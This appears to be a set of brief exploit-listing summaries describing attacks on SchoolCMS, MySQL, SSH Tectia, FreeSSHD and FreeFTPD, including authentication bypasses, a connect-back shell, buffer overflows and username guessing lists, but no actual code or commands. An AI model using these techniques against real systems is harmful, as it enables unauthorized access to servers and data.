A Persistant XSS vulnerability was discovered in the SchoolCMS software by PowerItSchools.com. The vulnerability lies in the eventform.php file, which allows an attacker to enter malicious JavaScript into the form boxes and save the event, which will store and trigger the persistent XSS script.
This exploit allows an attacker to gain SYSTEM level access to a Windows machine running a vulnerable version of MySQL Server. The attacker can use the pnscan tool to scan for vulnerable MySQL servers and the mysql_win_remote.pl tool to exploit the vulnerability. The accounts file holds the user/password combinations to try and the hits are saved in the jack.pot file.
An attacker in the possession of a valid username of an SSH Tectia installation running on UNIX (verified: AIX/Linux) can login without a password. The bug is in the SSH USERAUTH CHANGE REQUEST routines which are there to allow a user to change their password. A bug in this code allows an attacker to login without a password by forcing a password change request prior to authentication.
When an attacker authenticates using an incorrect password with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server, the mysql server will respond with a different message than Access Denied, what makes User Account Enumeration possible. The Downside is that the attacker has to reconnect for each user enumeration attempt.
FreeSSHD all versions are vulnerable to a remote authentication bypass vulnerability. This vulnerability was discovered and exploited by Kingcope in 2011. To exploit this vulnerability, an attacker can use the ssh.exe command with a valid username and the host. Valid usernames can include root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test, ssh, sftp, ftp, or anything else the attacker can imagine. The vulnerable banner of the most recent version is SSH-2.0-WeOnlyDo 2.1.3.
This exploit allows attackers to bypass authentication and gain system level access to FreeFTPD servers. The exploit uses a modified version of ssh.exe to bypass authentication, and then uploads nullevent.exe, MSVCR100.dll, and nullevent.mof to the server. The nullevent.mof file is then used to execute the connect back shell, which will connect back to the attacker's netcat listener after 1 minute.
This exploit uses the Net::MySQL module to connect to a MySQL server and send a command with a malformed packet. This causes the server to crash and the connection to be terminated.
As seen below $edx and $edi are fully controlled, the current instruction is => 0x83a6b24 <free_root+180>: mov (%edx),%edi which means 4 bytes can be controlled by 4 bytes with this function pointers and GOT entries can be rewritten to execute arbritrary code. A user account (with less privileges) is needed. Beware: this script will change the users password to an undefined value.
A stack-based buffer overflow vulnerability exists in MySQL Server versions 5.5.19-log and below (tested with Ver 5.1.53-log for suse-linux-gnu too). An unprivileged user (any account, including anonymous account) can exploit this vulnerability to overwrite the instruction pointer with 0x41414141, which will yield a shell as the user 'mysql' when properly exploited.
This exploit is a post-auth, udf technique which allows attackers to gain SYSTEM level access to a Windows machine running Oracle MySQL. It requires a valid database admin user and his password for the exploit to work properly. The exploit is mirrored at the farlight website http://www.farlight.org and includes a mass scanner. Installation instructions are provided in the text.
Services By CQR